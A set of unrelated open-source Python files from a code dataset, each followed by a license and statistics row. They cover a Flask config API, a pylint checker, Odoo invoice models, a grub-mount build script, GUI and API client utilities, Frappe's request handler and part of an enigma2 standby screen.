}
tasks_schema = {
'type': 'object',
'properties': {
'tasks': {
'type': 'array',
'items': {'$ref': '/schema/api/tasks/task'},
'links': [
{'rel': 'add', 'method': 'POST', 'href': '/api/tasks/', 'schema': {'$ref': '/schema/api/tasks/task'}}
]
}
}
}
# TODO: Maybe these should be in /config/tasks
@api_schema.route('/tasks/')
def schema_tasks():
return jsonify(tasks_schema)
@api.route('/tasks/', methods=['GET', 'POST'])
def api_tasks():
if request.method == 'GET':
tasks = []
for name in manager.tasks:
tasks.append({'name': name, 'config': manager.config['tasks'][name]})
return jsonify(tasks=tasks)
elif request.method == 'POST':
# TODO: Validate and add task
pass
@api_schema.route('/tasks/<task>/')
def schema_task(task):
return jsonify(task_schema)
@api.route('/tasks/<task>/', methods=['GET', 'PUT', 'DELETE'])
def api_task(task):
if request.method == 'GET':
if task not in manager.tasks:
return jsonify(error='task {task} not found'.format(task=task)), 404
return jsonify({'name': task, 'config': manager.config[task]})
elif request.method == 'PUT':
# TODO: Validate then set
# TODO: Return 204 if name has been changed
pass
elif request.method == 'DELETE':
manager.config['tasks'].pop(task)
@api_schema.route('/config/')
def cs_root():
root_schema = get_schema()
hyper_schema = root_schema.copy()
hyper_schema['links'] = [{'rel': 'self', 'href': '/api/config/'}]
hyper_schema['properties'] = root_schema.get('properties', {}).copy()
hs_props = hyper_schema['properties']
for key, key_schema in root_schema.get('properties', {}).iteritems():
hs_props[key] = hs_props[key].copy()
hs_props[key]['links'] = [{'rel': 'self', 'href': key}]
if key not in root_schema.get('required', []):
hs_props[key]['links'].append({'rel': 'delete', 'href': '', 'method': 'DELETE'})
return jsonify(hyper_schema)
# TODO: none of these should allow setting invalid config
@api.route('/config/', methods=['GET', 'PUT'])
def config_root():
return jsonify(manager.config)
@api_schema.route('/config/<section>')
def schema_config_section(section):
return jsonify(resolve_ref('/schema/config/%s' % section))
@api.route('/config/<section>/', methods=['GET', 'PUT', 'DELETE'])
def config_section(section):
if request.method == 'PUT':
schema = resolve_ref('/schema/config/%s' % section)
errors = process_config(request.json, schema, set_defaults=False)
if errors:
return jsonify({'$errors': errors}), 400
manager.config[section] = request.json
if section not in manager.config:
return jsonify(error='Not found'), 404
if request.method == 'DELETE':
del manager.config[section]
return Response(status=204)
response = jsonify(manager.config[section])
response.headers[b'Content-Type'] += '; profile=/schema/config/%s' % section
return response
# TODO: Abandon this and move above task handlers into /config?
@api.route('/config/tasks/<taskname>/', methods=['GET', 'PUT', 'DELETE'])
def config_tasks(taskname):
if request.method != 'PUT':
if taskname not in manager.config['tasks']:
return jsonify(error='Requested task does not exist'), 404
status_code = 200
if request.method == 'PUT':
if 'rename' in request.args:
pass # TODO: Rename the task, return 204 with new location header
if taskname not in manager.config['tasks']:
status_code = 201
manager.config['tasks'][taskname] = request.json
elif request.method == 'DELETE':
del manager.config['tasks'][taskname]
return Response(status=204)
return jsonify(manager.config['tasks'][taskname]), status_code
# TODO: Move this route to template plugin
@api_schema.route('/config/templates/', defaults={'section': 'templates'})
@api_schema.route('/config/tasks/', defaults={'section': 'tasks'})
def cs_task_container(section):
hyper_schema = {'links': [{'rel': 'create',
'href': '',
'method': 'POST',
'schema': {
'type': 'object',
'properties': {'name': {'type': 'string'}},
'required': ['name']}}]}
# TODO: Move this route to template plugin
@api_schema.route('/config/templates/<name>', defaults={'section': 'templates'})
@api_schema.route('/config/tasks/<name>', defaults={'section': 'tasks'})
def cs_plugin_container(section, name):
return plugin_schemas(context='task')
| mit | -145,441,332,919,503,260 | 33.647343 | 117 | 0.602064 | false |
rogalski/pylint | pylint/extensions/emptystring.py | 4 | 2417 | # -*- coding: utf-8 -*-
# Copyright (c) 2016 Alexander Todorov <[email protected]>
# Licensed under the GPL: https://www.gnu.org/licenses/old-licenses/gpl-2.0.html
# For details: https://github.com/PyCQA/pylint/blob/master/COPYING
"""Looks for comparisons to empty string."""
import itertools
import astroid
from pylint import interfaces
from pylint import checkers
from pylint.checkers import utils
def _is_constant_empty_str(node):
return isinstance(node, astroid.Const) and node.value == ''
class CompareToEmptyStringChecker(checkers.BaseChecker):
"""Checks for comparisons to empty string.
Most of the times you should use the fact that empty strings are false.
An exception to this rule is when an empty string value is allowed in the program
and has a different meaning than None!
"""
__implements__ = (interfaces.IAstroidChecker,)
# configuration section name
name = 'compare-to-empty-string'
msgs = {'C1901': ('Avoid comparisons to empty string',
'compare-to-empty-string',
'Used when Pylint detects comparison to an empty string constant.'),
}
priority = -2
options = ()
@utils.check_messages('compare-to-empty-string')
def visit_compare(self, node):
_operators = ['!=', '==', 'is not', 'is']
# note: astroid.Compare has the left most operand in node.left
# while the rest are a list of tuples in node.ops
# the format of the tuple is ('compare operator sign', node)
# here we squash everything into `ops` to make it easier for processing later
ops = [('', node.left)]
ops.extend(node.ops)
ops = list(itertools.chain(*ops))
for ops_idx in range(len(ops) - 2):
op_1 = ops[ops_idx]
op_2 = ops[ops_idx + 1]
op_3 = ops[ops_idx + 2]
error_detected = False
# x ?? ""
if _is_constant_empty_str(op_1) and op_2 in _operators:
error_detected = True
# '' ?? X
elif op_2 in _operators and _is_constant_empty_str(op_3):
error_detected = True
if error_detected:
self.add_message('compare-to-empty-string', node=node)
def register(linter):
"""Required method to auto register this checker."""
linter.register_checker(CompareToEmptyStringChecker(linter))
| gpl-2.0 | 3,413,561,731,749,634,600 | 33.042254 | 90 | 0.625155 | false |
ndtran/compassion-accounting | recurring_contract/model/invoice.py | 1 | 1713 | # -*- encoding: utf-8 -*-
##############################################################################
#
# Copyright (C) 2014 Compassion CH (http://www.compassion.ch)
# Releasing children from poverty in Jesus' name
# @author: Cyril Sester <[email protected]>
#
# The licence is in the file __openerp__.py
#
##############################################################################
from openerp import api, fields, models
class account_invoice(models.Model):
_name = 'account.invoice'
_inherit = 'account.invoice'
recurring_invoicer_id = fields.Many2one(
'recurring.invoicer', 'Invoicer')
class account_invoice_line(models.Model):
_name = 'account.invoice.line'
_inherit = 'account.invoice.line'
contract_id = fields.Many2one(
'recurring.contract', 'Source contract')
due_date = fields.Date(
compute='_get_invoice_lines_date_due',
readonly=True, store=True)
state = fields.Selection(
compute='_get_invoice_lines_state',
readonly=True, store=True,
selection=[('draft', 'Draft'),
('proforma', 'Pro-forma'),
('proforma2', 'Pro-forma'),
('open', 'Open'),
('paid', 'Paid'),
('cancel', 'Cancelled')])
@api.depends('invoice_id.state')
def _get_invoice_lines_state(self):
for invoice_line in self:
invoice_line.state = invoice_line.invoice_id.state
@api.depends('invoice_id.date_due')
def _get_invoice_lines_date_due(self):
for invoice_line in self:
invoice_line.due_date = invoice_line.invoice_id.date_due
| agpl-3.0 | 5,345,413,194,025,163,000 | 31.153846 | 78 | 0.52948 | false |
albertz/grub-fuse | compile.py | 1 | 4476 | #!/usr/bin/python
import os, os.path, sys
os.chdir(os.path.dirname(__file__))
try: os.mkdir("build")
except: pass
import re
from fnmatch import fnmatch
from pipes import quote
from pprint import pprint
CFLAGS = "-g -Wall -Iinclude -Igrub-core/gnulib " + \
"-Ibuild -DLIBDIR=\\\"/usr/local/lib\\\" " + \
"-DHAVE_CONFIG_H=1 -DGRUB_UTIL=1 " + \
"-DGRUB_FILE=__FILE__ " + \
"-D_FILE_OFFSET_BITS=64 " + \
"-fnested-functions " + \
"-DAPPLE_CC "
LDFLAGS = "-lfuse4x"
configh = open("build/config.h", "w")
configh.write("""
#define PACKAGE_NAME "grub"
#define PACKAGE_VERSION "1.0.0"
#define HAVE_WORKING_O_NOFOLLOW 1
#define HAVE_DECL_FWRITE_UNLOCKED 0
#define HAVE_DECL_FPUTS_UNLOCKED 0
#define __getopt_argv_const const
#define _GL_UNUSED
#if defined(__i386__)
#define NESTED_FUNC_ATTR __attribute__ ((__regparm__ (1)))
#else
#define NESTED_FUNC_ATTR
#endif
#if defined(__i386__)
#define SIZEOF_LONG 4
#define SIZEOF_VOID_P 4
#elif defined(__x86_64__)
#define SIZEOF_LONG 8
#define SIZEOF_VOID_P 8
#else
#error "unknown arch"
#endif
#define GRUB_TARGET_SIZEOF_VOID_P SIZEOF_VOID_P
char* strchrnul (const char *s, int c_in);
""")
for funcn in ["strcmp","strlen","strchr","strrchr","strdup","strtoull"]:
configh.write("#define grub_" + funcn + " " + funcn + "\n")
configh.close()
open("build/config-util.h", "w").write("")
re_grubmodinit = re.compile("GRUB_MOD_INIT\s*\((.+)\)")
ofiles = []
grubmods = []
def compile(fn):
basen,ext = os.path.splitext(fn)
ofile = "build/" + basen.replace("/","_") + ".o"
if ofile in ofiles: return # hm, whatever...
cmd = "gcc -c " + CFLAGS + " " + quote(fn) + " -o " + quote(ofile)
print cmd
assert os.system(cmd) == 0
ofiles.append(ofile)
m = re_grubmodinit.search(open(fn).read())
if m: grubmods.append(m.group(1))
re_base_start = re.compile("^([a-z]+) = {")
re_base_end = re.compile("^};")
re_entry_stmnt = re.compile("^ *([a-z_0-9]+);$")
re_entry = re.compile("^ *([a-z_0-9]+) = (.*);$")
content = {} # type (e.g. 'program') -> list -> dict
curentry = None
for l in open("Makefile.util.def"):
l = l.strip("\n")
if l.strip() == "": continue
if l.strip()[0:1] == "#": continue
m = re_base_start.match(l)
if m:
typename = m.group(1)
curentry = {}
if typename not in content: content[typename] = []
content[typename].append(curentry)
continue
m = re_base_end.match(l)
if m:
curentry = None
continue
if curentry is not None:
if re_entry_stmnt.match(l): continue
m = re_entry.match(l)
assert m, "no match in " + repr(l)
k,v = m.groups()
if k not in curentry:
curentry[k] = []
curentry[k].append(v)
libs = {}
progs = {}
for l in content["library"]:
libs[l["name"][0]] = l
for l in content["program"]:
progs[l["name"][0]] = l
# ------------
def read_gnulib_makefile():
re_vardef = re.compile("^([a-zA-Z_]+) *= *(.*)$")
re_variadd = re.compile("^([a-zA-Z_]+) *\+= *(.*)$")
re_filerules = re.compile("^([a-zA-Z_.\-\+/]+) *: *(.*)$")
vars = {}
fileiter = iter(open("grub-core/gnulib/Makefile.am"))
for l in fileiter:
while True:
l = l.strip("\n")
if l[-1:] == "\\":
l = l[:-1]
l += next(fileiter)
else: break
if l.strip() == "": continue
if l.strip()[0:1] == "#": continue
m = re_vardef.match(l)
if m:
k,v = m.groups()
assert not k in vars
vars[k] = v
continue
m = re_variadd.match(l)
if m:
k,v = m.groups()
assert k in vars
vars[k] += " " + v
continue
m = re_filerules.match(l)
if m:
# ignore
continue
if l[0:1] == "\t": # file rule part
continue
assert False, l + " not matched"
return vars["libgnu_a_SOURCES"].split()
# ------------
prog = progs["grub-mount"]
lddeps = []
curtarget = prog
while True:
for f in curtarget["common"]:
compile(f)
for d in curtarget.get("ldadd", []):
if fnmatch(d, "lib*.a"):
lddeps.append(d)
if not lddeps: break
curtarget = libs[lddeps.pop(0)]
for f in read_gnulib_makefile():
if not fnmatch(f, "*.c"): continue
compile("grub-core/gnulib/" + f)
assert os.system("sh geninit.sh " + " ".join(map(quote, grubmods)) + " >build/grubinit.c") == 0
compile("build/grubinit.c")
# additional stuff
compile("grub-core/gnulib/mempcpy.c")
compile("grub-core/gnulib/strchrnul.c")
compile("grub-core/gnulib/getopt.c")
compile("grub-core/gnulib/getopt1.c")
compile("grub-core/gnulib/rawmemchr.c")
compile("grub-core/gnulib/basename-lgpl.c")
cmd = "g++ " + LDFLAGS + " " + " ".join(map(quote, ofiles)) + " -o build/grub-mount"
print cmd
assert os.system(cmd) == 0
| gpl-3.0 | 3,300,640,583,022,266,400 | 23.459016 | 95 | 0.613047 | false |
fgoudreault/auxiclean | auxiclean/gui/equality_breaker.py | 1 | 3366 | from .auxiliary_window import AuxiliaryWindow
from ..handler import TextHandler
import tkinter as tk
class EqualityBreaker(AuxiliaryWindow):
_title = "Auxiclean - EqualityBreaker"
_loggername = "auxiclean.gui.equality_breaker"
def __init__(self, candidates, nchoices, course, *args, **kwargs):
# Logging configuration
self.nchoices = nchoices
self.choices = []
self.course = course
self.candidates = candidates
super().__init__(*args, **kwargs)
def create_window(self):
candidates = self.candidates
nchoices = self.nchoices
course = self.course
# instructions
p = ("Des égalités sont présentes pour le cours: %s.\n"
"Il faut choisir %i candidat(e)s parmis les choix suivants.\n"
"SVP, cocher les candidatures désirées pour ce cours." %
(course, nchoices))
self.instructionsText = tk.Label(self.frame, text=p, anchor=tk.W,
justify=tk.LEFT)
self.instructionsText.grid(column=0, row=0)
# candidates list, create checkboxes
self.checkbuttons = {}
for i, candidate in enumerate(candidates):
d = {"var": tk.Variable(),
"candidate": candidate}
self.checkbuttons[candidate.name] = d
button = tk.Checkbutton(self.frame, text=candidate.name,
anchor="w",
variable=d["var"],
)
button.deselect()
button.grid(row=i + 1, column=0)
# done button
self.doneButton = tk.Button(self.frame, text="Terminé",
command=self.compile_results)
self.doneButton.grid()
# create log box
# adapted from this SO post:
# https://stackoverflow.com/a/41959785/6362595
# Add text widget to display logging info
self.logBox = tk.scrolledtext.ScrolledText(self.frame,
state='disabled')
self.logBox.configure(font='TkFixedFont')
self.logBox.grid(sticky='w', columnspan=1)
# Create textLogger
self.text_handler = TextHandler(self.logBox)
# Logging configuration
self._logger.addHandler(self.text_handler)
def compile_results(self):
choices = self.get_checkboxes_results()
if len(choices) == self.nchoices:
confirm = tk.messagebox.askquestion("Confirmer Choix",
"Êtes-vous sûr(e)"
" de ces choix?")
if confirm == "yes":
self.choices = choices
self.quit()
return
else:
# confirm == "no"
return
self._logger.warn("Nombre de candidatures choisies invalide (%i/%i)" %
(len(choices), self.nchoices))
def get_checkboxes_results(self):
results = []
for name, checkbox in self.checkbuttons.items():
if int(checkbox["var"].get()):
# if button is toggled, it will return 1. otherwise 0
results.append(self.checkbuttons[name]["candidate"])
return results
| mit | -8,210,463,254,876,397,000 | 38.505882 | 78 | 0.538416 | false |
statX/nz-houses | clients/client_koordinates.py | 1 | 1958 | #!/usr/bin/env python
#http://api.trademe.co.nz/v1/Listings/553527490.json
import oauth2 as oauth
import time
import urllib2
import json
def retrieve_school_zone():
with open('./kdapikeys.txt') as fileObject:
KEYHERE = fileObject.readline().strip()
#school zone request
apiRequest = 'http://api.koordinates.com/api/vectorQuery.json/?key=' + KEYHERE + '&layer=743&x='
apiRequest += str(174.6964)
apiRequest += '&y='
apiRequest += str(-36.9246)
apiRequest += '&radius=0'
rs = urllib2.urlopen(apiRequest)
result_string = rs.read()
results = json.loads(result_string)
features = results.get('vectorQuery').get('layers').get('743').get('features')
for i in range(0,len(features)):
distance = features[i].get('properties').get('distance')
schoolID = features[i].get('properties').get('SchoolID')
schoolName = features[i].get('properties').get('SchoolName')
effectiveDate = features[i].get('properties').get('EffectiveDate')
iNSTTYPE = features[i].get('properties').get('INSTTYPE')
# create tuple and append to tuples
def retrieve_elevation():
with open('./kdapikeys.txt') as fileObject:
KEYHERE = fileObject.readline().strip()
#apiRequest = 'http://api.koordinates.com/api/vectorQuery.json?key=' + KEYHERE + '&layer=1165&x=174.7254467010498&y=-36.871106809995844&max_results=3&radius=10000&geometry=true&with_field_names=true'
#apiRequest = 'http://api.koordinates.com/api/vectorQuery.json?key=' + KEYHERE + '&layer=281&x=174.7254467010498&y=-36.871106809995844&max_results=3&radius=10000&geometry=true&with_field_names=true'
apiRequest = 'http://api.koordinates.com/api/vectorQuery.json?key=' + KEYHERE + '&layer=1066&x=174.7254467010498&y=-36.871106809995844&max_results=3&radius=0&geometry=true&with_field_names=true'
rs = urllib2.urlopen(apiRequest)
result_string = rs.read()
results = json.loads(result_string)
print results
if __name__ == '__main__':
retrieve_school_zone()
retrieve_elevation()
| bsd-2-clause | -1,435,137,139,717,250,800 | 33.350877 | 200 | 0.720633 | false |
yoshinarikou/MilleFeuilleRaspberryPi | milpython/milpy/lib/gpio.py | 1 | 1610 | ########################################################################
# MCU Gear(R) system Sample Code
# Auther:y.kou.
# web site: http://www.milletool.com/
# Date : 8/OCT/2016
#
########################################################################
#Revision Information
#
########################################################################
#!/usr/bin/python
from ..mil import mil
from ..mil import p
from ..mil import wiringdata
moduleAddress1 = 0x8000
moduleAddress2 = 0x0001
moduleAddress = 0x80000001
def getInfo(Number):
if ((Number >= 0) and (Number <= 3)):
address = moduleAddress + Number
address2 = moduleAddress2 + Number
address1 = moduleAddress1
#check address
testaddr = (address1<<16) + address2
if address != testaddr:
print "ERROR: Device address is not correct!"
address1 = -1
address2 = -1
else:
address = -1
IOdata = wiringdata.getWiring(address)
datas = [address1,address2]
datas.extend(IOdata)
return datas
def getAddr(Number):
address = -1
if ((Number >= 0) and (Number <= 3)):
address = moduleAddress2 + Number
else:
address = -1
return moduleAddress1,moduleAddress2
def getIOs():
IOdata = wiringdata.getWiring(moduleAddress)
return IOdata
#digital out function
def DigitalOut(milModClass, pinNo, HighLow):
wiringdata.IOout(milModClass.pinData[pinNo],HighLow)
#digital in function
def DigitalIn(milModClass, pinNo):
return wiringdata.IOin(milModClass.pinData[pinNo])
def turnMotor(milModClass, HighLow1, HighLow2):
wiringdata.IOout(milModClass.pinData[0],HighLow1)
wiringdata.IOout(milModClass.pinData[1],HighLow2)
| mit | 5,481,458,723,627,884,000 | 23.769231 | 72 | 0.631056 | false |
aliok/trnltk | trnltk/morphology/contextful/likelihoodmetrics/hidden/test/test_simplegoodturing.py | 1 | 3202 | # coding=utf-8
"""
Copyright 2012 Ali Ok (aliokATapacheDOTorg)
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
"""
There is no verification -yet- in test of this class.
The tests are there for making sure there is no run time exceptions
"""
import logging
import unittest
from trnltk.morphology.contextful.likelihoodmetrics.hidden.simplegoodturing import logger, SimpleGoodTuringSmoother
K = 5
class SimpleGoodTuringSmootherTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
super(SimpleGoodTuringSmootherTest, cls).setUpClass()
def setUp(self):
logging.basicConfig(level=logging.INFO)
logger.setLevel(logging.DEBUG)
def test_smoother_assertions(self):
self.assertRaises(AssertionError, lambda : SimpleGoodTuringSmoother(0, {1:2}, 3))
self.assertRaises(AssertionError, lambda : SimpleGoodTuringSmoother(2, {}, 2))
self.assertRaises(AssertionError, lambda : SimpleGoodTuringSmoother(2, {1:2}, 0))
self.assertRaises(AssertionError, lambda : SimpleGoodTuringSmoother(1, {0:1}, 3))
self.assertRaises(AssertionError, lambda : SimpleGoodTuringSmoother(1, {1:2}, 1))
self.assertRaises(AssertionError, lambda : SimpleGoodTuringSmoother(1, {1:2}, 2))
self.assertRaises(AssertionError, lambda : SimpleGoodTuringSmoother(2, {1:2, 2:3}, 2))
self.assertRaises(AssertionError, lambda : SimpleGoodTuringSmoother(2, {1:2, 2:3}, 3))
def test_with_small_values(self):
smoother = SimpleGoodTuringSmoother(K, {1: 10, 2: 5, 3: 3, 4: 2, 5: 1, 6: 0}, 100)
smoother.initialize()
for i in range(0, K + 5):
logger.info("c_{} : {}, \t c*_{} : {}".format(i, i, i, smoother.smooth(i)))
def test_with_larger_values(self):
smoother = SimpleGoodTuringSmoother(K, {1: 268, 2: 112, 3: 70, 4: 41, 5: 24, 6: 14, 7: 15, 400: 1, 1918: 1}, 1000)
smoother.initialize()
for i in range(0, K + 5):
logger.info("c_{} : {}, \t c*_{} : {}".format(i, i, i, smoother.smooth(i)))
def test_with_larger_values_sc_2(self):
smoother = SimpleGoodTuringSmoother(K, {1: 16181, 2: 2213, 3: 870, 4: 431, 5: 304, 6: 202}, 2111251811)
smoother.initialize()
for i in range(0, K + 5):
logger.info("c_{} : {}, \t c*_{} : {}".format(i, i, i, smoother.smooth(i)))
def test_with_zero_frequencies_in_between(self):
smoother = SimpleGoodTuringSmoother(K, {1: 268, 2: 0, 3: 70, 4: 0, 5: 24, 6: 14, 7: 15, 400: 1, 1918: 1}, 1000)
smoother.initialize()
for i in range(0, K + 5):
logger.info("c_{} : {}, \t c*_{} : {}".format(i, i, i, smoother.smooth(i)))
if __name__ == '__main__':
unittest.main()
| apache-2.0 | 2,126,987,249,120,535,000 | 39.531646 | 122 | 0.657089 | false |
adityahase/frappe | frappe/app.py | 1 | 8114 | # -*- coding: utf-8 -*-
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import os
from six import iteritems
import logging
from werkzeug.wrappers import Request
from werkzeug.local import LocalManager
from werkzeug.exceptions import HTTPException, NotFound
from werkzeug.middleware.profiler import ProfilerMiddleware
from werkzeug.middleware.shared_data import SharedDataMiddleware
import frappe
import frappe.handler
import frappe.auth
import frappe.api
import frappe.utils.response
import frappe.website.render
from frappe.utils import get_site_name, sanitize_html
from frappe.middlewares import StaticDataMiddleware
from frappe.utils.error import make_error_snapshot
from frappe.core.doctype.comment.comment import update_comments_in_parent_after_request
from frappe import _
import frappe.recorder
import frappe.monitor
import frappe.rate_limiter
local_manager = LocalManager([frappe.local])
_site = None
_sites_path = os.environ.get("SITES_PATH", ".")
class RequestContext(object):
def __init__(self, environ):
self.request = Request(environ)
def __enter__(self):
init_request(self.request)
def __exit__(self, type, value, traceback):
frappe.destroy()
@Request.application
def application(request):
response = None
try:
rollback = True
init_request(request)
frappe.recorder.record()
frappe.monitor.start()
frappe.rate_limiter.apply()
if frappe.local.form_dict.cmd:
response = frappe.handler.handle()
elif frappe.request.path.startswith("/api/"):
response = frappe.api.handle()
elif frappe.request.path.startswith('/backups'):
response = frappe.utils.response.download_backup(request.path)
elif frappe.request.path.startswith('/private/files/'):
response = frappe.utils.response.download_private_file(request.path)
elif frappe.local.request.method in ('GET', 'HEAD', 'POST'):
response = frappe.website.render.render()
else:
raise NotFound
except HTTPException as e:
return e
except frappe.SessionStopped as e:
response = frappe.utils.response.handle_session_stopped()
except Exception as e:
response = handle_exception(e)
else:
rollback = after_request(rollback)
finally:
if frappe.local.request.method in ("POST", "PUT") and frappe.db and rollback:
frappe.db.rollback()
# set cookies
if response and hasattr(frappe.local, 'cookie_manager'):
frappe.local.cookie_manager.flush_cookies(response=response)
frappe.rate_limiter.update()
frappe.monitor.stop(response)
frappe.recorder.dump()
if hasattr(frappe.local, 'conf') and frappe.local.conf.enable_frappe_logger:
frappe.logger("frappe.web", allow_site=frappe.local.site).info({
"site": get_site_name(request.host),
"remote_addr": getattr(request, "remote_addr", "NOTFOUND"),
"base_url": getattr(request, "base_url", "NOTFOUND"),
"full_path": getattr(request, "full_path", "NOTFOUND"),
"method": getattr(request, "method", "NOTFOUND"),
"scheme": getattr(request, "scheme", "NOTFOUND"),
"http_status_code": getattr(response, "status_code", "NOTFOUND")
})
if response and hasattr(frappe.local, 'rate_limiter'):
response.headers.extend(frappe.local.rate_limiter.headers())
frappe.destroy()
return response
def init_request(request):
frappe.local.request = request
frappe.local.is_ajax = frappe.get_request_header("X-Requested-With")=="XMLHttpRequest"
site = _site or request.headers.get('X-Frappe-Site-Name') or get_site_name(request.host)
frappe.init(site=site, sites_path=_sites_path)
if not (frappe.local.conf and frappe.local.conf.db_name):
# site does not exist
raise NotFound
if frappe.local.conf.get('maintenance_mode'):
frappe.connect()
raise frappe.SessionStopped('Session Stopped')
make_form_dict(request)
frappe.local.http_request = frappe.auth.HTTPRequest()
def make_form_dict(request):
import json
request_data = request.get_data(as_text=True)
if 'application/json' in (request.content_type or '') and request_data:
args = json.loads(request_data)
else:
args = request.form or request.args
try:
frappe.local.form_dict = frappe._dict({ k:v[0] if isinstance(v, (list, tuple)) else v \
for k, v in iteritems(args) })
except IndexError:
frappe.local.form_dict = frappe._dict(args)
if "_" in frappe.local.form_dict:
# _ is passed by $.ajax so that the request is not cached by the browser. So, remove _ from form_dict
frappe.local.form_dict.pop("_")
def handle_exception(e):
response = None
http_status_code = getattr(e, "http_status_code", 500)
return_as_message = False
if frappe.get_request_header('Accept') and (frappe.local.is_ajax or 'application/json' in frappe.get_request_header('Accept')):
# handle ajax responses first
# if the request is ajax, send back the trace or error message
response = frappe.utils.response.report_error(http_status_code)
elif (http_status_code==500
and (frappe.db and isinstance(e, frappe.db.InternalError))
and (frappe.db and (frappe.db.is_deadlocked(e) or frappe.db.is_timedout(e)))):
http_status_code = 508
elif http_status_code==401:
frappe.respond_as_web_page(_("Session Expired"),
_("Your session has expired, please login again to continue."),
http_status_code=http_status_code, indicator_color='red')
return_as_message = True
elif http_status_code==403:
frappe.respond_as_web_page(_("Not Permitted"),
_("You do not have enough permissions to complete the action"),
http_status_code=http_status_code, indicator_color='red')
return_as_message = True
elif http_status_code==404:
frappe.respond_as_web_page(_("Not Found"),
_("The resource you are looking for is not available"),
http_status_code=http_status_code, indicator_color='red')
return_as_message = True
elif http_status_code == 429:
response = frappe.rate_limiter.respond()
else:
traceback = "<pre>" + sanitize_html(frappe.get_traceback()) + "</pre>"
# disable traceback in production if flag is set
if frappe.local.flags.disable_traceback and not frappe.local.dev_server:
traceback = ""
frappe.respond_as_web_page("Server Error",
traceback, http_status_code=http_status_code,
indicator_color='red', width=640)
return_as_message = True
if e.__class__ == frappe.AuthenticationError:
if hasattr(frappe.local, "login_manager"):
frappe.local.login_manager.clear_cookies()
if http_status_code >= 500:
make_error_snapshot(e)
if return_as_message:
response = frappe.website.render.render("message",
http_status_code=http_status_code)
return response
def after_request(rollback):
if (frappe.local.request.method in ("POST", "PUT") or frappe.local.flags.commit) and frappe.db:
if frappe.db.transaction_writes:
frappe.db.commit()
rollback = False
# update session
if getattr(frappe.local, "session_obj", None):
updated_in_db = frappe.local.session_obj.update()
if updated_in_db:
frappe.db.commit()
rollback = False
update_comments_in_parent_after_request()
return rollback
application = local_manager.make_middleware(application)
def serve(port=8000, profile=False, no_reload=False, no_threading=False, site=None, sites_path='.'):
global application, _site, _sites_path
_site = site
_sites_path = sites_path
from werkzeug.serving import run_simple
if profile:
application = ProfilerMiddleware(application, sort_by=('cumtime', 'calls'))
if not os.environ.get('NO_STATICS'):
application = SharedDataMiddleware(application, {
str('/assets'): str(os.path.join(sites_path, 'assets'))
})
application = StaticDataMiddleware(application, {
str('/files'): str(os.path.abspath(sites_path))
})
application.debug = True
application.config = {
'SERVER_NAME': 'localhost:8000'
}
log = logging.getLogger('werkzeug')
log.propagate = False
in_test_env = os.environ.get('CI')
if in_test_env:
log.setLevel(logging.ERROR)
run_simple('0.0.0.0', int(port), application,
use_reloader=False if in_test_env else not no_reload,
use_debugger=not in_test_env,
use_evalex=not in_test_env,
threaded=not no_threading)
| mit | -1,566,488,549,490,101,500 | 28.830882 | 128 | 0.726769 | false |
OpenPLi/enigma2 | lib/python/Screens/Standby.py | 2 | 14247 | import os
import RecordTimer
import Components.ParentalControl
from Screens.Screen import Screen
from Screens.MessageBox import MessageBox
from Components.ActionMap import ActionMap
from Components.config import config
from Components.AVSwitch import AVSwitch
from Components.Console import Console
from Components.ImportChannels import ImportChannels
from Components.SystemInfo import SystemInfo
from Components.Sources.StreamService import StreamServiceList
from Components.Task import job_manager
from Tools.Directories import mediafilesInUse
from Tools import Notifications
from time import time, localtime
from GlobalActions import globalActionMap
from enigma import eDVBVolumecontrol, eTimer, eDVBLocalTimeHandler, eServiceReference, eStreamServer, quitMainloop, iRecordableService
inStandby = None
infoBarInstance = None
QUIT_SHUTDOWN = 1
QUIT_REBOOT = 2
QUIT_RESTART = 3
QUIT_UPGRADE_FP = 4
QUIT_ERROR_RESTART = 5
QUIT_DEBUG_RESTART = 6
QUIT_MANUFACTURER_RESET = 7
QUIT_MAINT = 16
QUIT_UPGRADE_PROGRAM = 42
QUIT_IMAGE_RESTORE = 43
def isInfoBarInstance():
global infoBarInstance
if infoBarInstance is None:
from Screens.InfoBar import InfoBar
if InfoBar.instance:
infoBarInstance = InfoBar.instance
return infoBarInstance
def checkTimeshiftRunning():
infobar_instance = isInfoBarInstance()
return config.usage.check_timeshift.value and infobar_instance and infobar_instance.timeshiftEnabled() and infobar_instance.timeshift_was_activated
class StandbyScreen(Screen):
def __init__(self, session, StandbyCounterIncrease=True):
self.skinName = "Standby"
Screen.__init__(self, session)
self.avswitch = AVSwitch()
print "[Standby] enter standby"
if os.path.exists("/usr/script/standby_enter.sh"):
Console().ePopen("/usr/script/standby_enter.sh")
self["actions"] = ActionMap(["StandbyActions"],
{
"power": self.Power,
"discrete_on": self.Power
}, -1)
globalActionMap.setEnabled(False)
self.infoBarInstance = isInfoBarInstance()
from Screens.SleepTimerEdit import isNextWakeupTime
self.StandbyCounterIncrease = StandbyCounterIncrease
self.standbyTimeoutTimer = eTimer()
self.standbyTimeoutTimer.callback.append(self.standbyTimeout)
self.standbyStopServiceTimer = eTimer()
self.standbyStopServiceTimer.callback.append(self.stopService)
self.standbyWakeupTimer = eTimer()
self.standbyWakeupTimer.callback.append(self.standbyWakeup)
self.timeHandler = None
self.setMute()
self.paused_service = self.paused_action = False
self.prev_running_service = self.session.nav.getCurrentlyPlayingServiceOrGroup()
if Components.ParentalControl.parentalControl.isProtected(self.prev_running_service):
self.prev_running_service = eServiceReference(config.tv.lastservice.value)
service = self.prev_running_service and self.prev_running_service.toString()
if service:
if service.rsplit(":", 1)[1].startswith("/"):
self.paused_service = hasattr(self.session.current_dialog, "pauseService") and hasattr(self.session.current_dialog, "unPauseService") and self.session.current_dialog or self.infoBarInstance
self.paused_action = hasattr(self.paused_service, "seekstate") and hasattr(self.paused_service, "SEEK_STATE_PLAY") and self.paused_service.seekstate == self.paused_service.SEEK_STATE_PLAY
self.paused_action and self.paused_service.pauseService()
if not self.paused_service:
self.timeHandler = eDVBLocalTimeHandler.getInstance()
if self.timeHandler.ready():
if self.session.nav.getCurrentlyPlayingServiceOrGroup():
self.stopService()
else:
